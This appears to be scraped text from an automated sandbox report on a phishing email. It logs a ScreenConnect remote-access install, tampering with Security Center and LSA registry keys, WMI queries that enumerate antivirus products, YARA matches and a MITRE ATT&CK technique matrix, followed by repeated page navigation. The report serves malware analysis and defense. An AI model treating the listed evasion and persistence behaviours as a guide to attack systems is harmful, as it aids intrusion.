Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSI8F57.tmp-\ScreenConnect.InstallerActions.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSI8F57.tmp-\ScreenConnect.Core.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\MSI8F57.tmp-\ScreenConnect.Windows.dll VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Changes security center settings (notifications, updates, antivirus, firewall)

Source: C:\Windows\System32\svchost.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval

Modifies security policies related information

Source: C:\Windows\System32\msiexec.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication Packages

Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Windows\System32\svchost.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Source: Yara match	File source: 00000014.00000002.1542049999.0000000005790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1546459519.00000000075E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.1515151680.0000000000EC6000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1533504706.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\Downloads\Unconfirmed 804247.crdownload, type: DROPPED
Source: Yara match	File source: 0000001C.00000000.1584484803.0000000000712000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1751971553.0000000007371000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.1734467587.0000000002AEB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Windows\Temp\~DF42CD5E763AF0112E.TMP, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DF402DAAA47C81A5E6.TMP, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DF0ECFDAA9E240F7F8.TMP, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DFF4B271A08BFF7223.TMP, type: DROPPED
Source: Yara match	File source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
Source: Yara match	File source: C:\Config.Msi\60deb5.rbs, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe, type: DROPPED
Source: Yara match	File source: 00000028.00000002.2040657756.0000000007AB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000028.00000002.2016235935.0000000003311000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Windows\Temp\~DFFD1E74624B2A07AF.TMP, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DFF27562D9BAF51155.TMP, type: DROPPED
Source: Yara match	File source: C:\Windows\Temp\~DF20F2A043957C83BC.TMP, type: DROPPED
Source: Yara match	File source: 0000001C.00000002.2232338708.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Replication Through Removable Media	31 Windows Management Instrumentation	1 Component Object Model Hijacking	1 Component Object Model Hijacking	22 Masquerading	OS Credential Dumping	15 Security Software Discovery	Remote Services	Data from Local System	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	2 Windows Service	2 Windows Service	21 Disable or Modify Tools	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	31 Browser Extensions	11 Process Injection	71 Virtualization/Sandbox Evasion	Security Account Manager	71 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	1 Registry Run Keys / Startup Folder	11 Process Injection	NTDS	11 Peripheral Device Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 DLL Side-Loading	1 DLL Side-Loading	1 Rundll32	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	35 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 File Deletion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report
phish_alert_iocp_v1.4.48 - 2025-01-16T090409.755.eml

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Screenshots

Thumbnails

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report phish_alert_iocp_v1.4.48 - 2025-01-16T090409.755.eml

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Remote Access Functionality

Mitre Att&ck Matrix

Screenshots

Thumbnails

Windows Analysis Report
phish_alert_iocp_v1.4.48 - 2025-01-16T090409.755.eml